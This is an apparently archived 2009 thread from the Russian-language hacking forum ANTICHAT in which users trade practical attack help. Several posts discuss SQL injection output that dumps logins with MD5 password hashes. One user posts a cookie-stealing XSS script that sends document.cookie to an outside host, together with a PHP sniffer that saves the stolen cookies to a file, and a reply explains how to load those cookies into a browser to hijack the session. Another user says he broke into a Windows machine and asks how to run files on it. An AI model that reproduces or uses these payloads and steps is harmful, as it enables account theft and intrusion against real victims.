HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8321  
Старый 29.07.2009, 22:24
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию

Цитата:
Сообщение от nub-hacker  
после зелёного идёт MD5
это понятно что мд5,но эта часть во всех записях не меняется .
 
Ответить с цитированием

  #8322  
Старый 29.07.2009, 22:27
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

L I G A

Меняется окончание логина? Где разделитель-то?

или concat_ws(0x3a,login,pass) или concat(login,0x3a,pass), ты уж определись
 
Ответить с цитированием

  #8323  
Старый 29.07.2009, 22:30
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию

concat_ws(0x3a,login,pass)
login363307:5f4dcc3b5aa765d61d8327deb882cf99
меняется:
login363307:5f4dcc3b5aa765d61d8327deb882cf99

Последний раз редактировалось L I G A; 29.07.2009 в 22:37..
 
Ответить с цитированием

  #8324  
Старый 29.07.2009, 22:42
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055

Репутация: 347
По умолчанию

наверно таки у них пароли одинаковые) будто бы какой-то неоригинальный реггер заюзали
 
Ответить с цитированием

  #8325  
Старый 29.07.2009, 22:44
nub-hacker
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165

Репутация: -67
По умолчанию

Это чтото типа соли. токо для логина. короче лучше ставь себе этот двиг на машину и ковыряйся и разбирайся
 
Ответить с цитированием

  #8326  
Старый 29.07.2009, 22:57
kiddie
Новичок
Регистрация: 15.07.2009
Сообщений: 20
Провел на форуме:
271833

Репутация: 4
По умолчанию

Подскажите, на снифер приходят такого рода данные
com=iua=1;%20b=b;%20iua=1;%20b=b;%20holder=1;%20UH =25a4c4a69cc7f;%20I=24c6983d0fe73223;%20L=1.11
благодаря xss на уязвимом сайте , тобиш тело письма такое
Код HTML:
<script>document.location.replace('http://*****.t35.com/script.php?com='+document.cookie);</script>
код снифа :
PHP код:
<?  $query $_SERVER['QUERY_STRING'];  $query .= "\n";  $db="cookies.txt";  $fh=fopen ($db"a+");  fputs ($fh"$query");  fclose ($fh);  ?>
что обозначают полученные данные, тоесть что приходит...?
 
Ответить с цитированием

  #8327  
Старый 29.07.2009, 23:09
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Цитата:
Сообщение от ph1l1ster  
Уязвимости php 5.2 ??

http://www.xakep.ru/vulnerability/PHP/

Так точно,сержант Витя )У мя от нижеприведённого сплойта сознание уплывает)Ну что ж,попробую чтоли : Р
 
Ответить с цитированием

  #8328  
Старый 29.07.2009, 23:10
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

$_SERVER['QUERY_STRING']
 
Ответить с цитированием

  #8329  
Старый 29.07.2009, 23:32
nub-hacker
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165

Репутация: -67
По умолчанию

Хакнул комп с помошбю последнего сплоита под мастдай. есть cmd.exe подскажите как залить мне файл туда. чтобы потом его выполнить или чтото подобное подскажите что можно с делать в моём случае

ЗЫ с меня +
 
Ответить с цитированием

  #8330  
Старый 30.07.2009, 03:37
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию

Цитата:
Сообщение от kiddie  
Подскажите, на снифер приходят такого рода данные
com=iua=1;%20b=b;%20iua=1;%20b=b;%20holder=1;%20UH =25a4c4a69cc7f;%20I=24c6983d0fe73223;%20L=1.11
благодаря xss на уязвимом сайте , тобиш тело письма такое
Код HTML:
<script>document.location.replace('http://*****.t35.com/script.php?com='+document.cookie);</script>
код снифа :
PHP код:
<?  $query $_SERVER['QUERY_STRING'];  $query .= "\n";  $db="cookies.txt";  $fh=fopen ($db"a+");  fputs ($fh"$query");  fclose ($fh);  ?>
что обозначают полученные данные, тоесть что приходит...?
это мой друг к тебе пришли куки (Ку́ки (слово не склоняется; от англ. cookie — печенье) — небольшой фрагмент данных, созданный веб-сервером и хранимый на компьютере пользователя в виде файла, который веб-клиент (обычно веб-браузер) каждый раз пересылает веб-серверу в HTTP-запросе при попытке открыть страницу соответствующего сайта. © ru.wikipedia.org)
Теперь твоя задача, подменить на полученные данные, свои. А сделать это можно следующим образом:
  1. Mozilla Firefox - при помощи плагина: Add N Edit Cookies
  2. Opera - следующей манипуляцией: "Инструменты -> Дополнительно -> Управление cookies..."
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ